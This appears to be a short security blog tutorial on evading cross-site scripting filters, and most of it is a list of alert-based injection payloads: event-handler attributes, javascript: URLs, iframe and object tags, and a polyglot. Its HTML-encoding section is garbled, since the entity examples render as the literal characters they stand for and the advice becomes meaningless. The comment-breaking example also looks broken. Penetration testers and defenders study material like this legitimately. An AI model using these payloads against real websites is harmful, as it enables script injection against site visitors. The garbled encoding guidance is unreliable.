Bypassing XSS Filters

G5 Cyber Security

2 weeks ago

TL;DR

XSS filters try to stop malicious code from running in a web browser. They often block common tags like <script>. However, there are many ways to get around these filters. This guide shows some techniques.

Understanding XSS Filters

XSS (Cross-Site Scripting) filters work by looking for patterns in user input that might be harmful. They then either remove the harmful parts or encode them so they can’t run as code. Commonly, they block <script> tags, but more sophisticated filters look for event handlers like onload and other techniques.

Bypassing Techniques

Case Sensitivity: Some filters are case-sensitive. Try variations like <ScRiPt>.
HTML Encoding: Filters might not decode HTML entities correctly. Try using encoded characters:
- < for <
- > for >
- & for &
For example, instead of <script>, try <script>.
Attribute Injection: Inject JavaScript into HTML attributes.
```
<img src="x" onerror=alert('XSS')>
```
This code will execute the alert('XSS') function when the image fails to load.
Event Handlers: Use event handlers in HTML tags.
```
<body onload=alert('XSS')>
```
This code will execute the alert('XSS') function when the page loads.
Tag Attributes with JavaScript:
```
<input type="text" value="" onfocus=alert('XSS') autofocus>
```
This will execute alert('XSS') when the input field gains focus.
URL Schemes: Use JavaScript URL schemes.
```
<a href="javascript:alert('XSS')">Click me
```
When clicked, this link will execute alert('XSS').
Using Different Tags: Try other tags that can execute JavaScript:
- <iframe src="javascript:alert('XSS')">
- <object data="javascript:alert('XSS')">
Breaking Filters with Comments: Sometimes, filters don’t handle comments correctly.
```
<script>//--></script>alert('XSS')
```
Polyglot Payloads: Create payloads that work in multiple contexts (e.g., HTML, JavaScript).
```
<img src=x onerror="');alert('XSS')//">
```
Filter Evasion Characters: Some filters block specific characters. Try using alternative representations or encoding.
- Use Unicode characters for quotes (e.g., ", ")
- Try different line breaks and whitespace variations.

Important Considerations

Context Matters: The effectiveness of these techniques depends on the specific filter being used and where the input is placed in the web page.
Browser Variations: Different browsers may interpret JavaScript differently, so test your payloads across multiple browsers.
cyber security Best Practices: Always sanitize user input on the server-side to prevent XSS vulnerabilities. Client-side filtering should be considered a secondary layer of defense.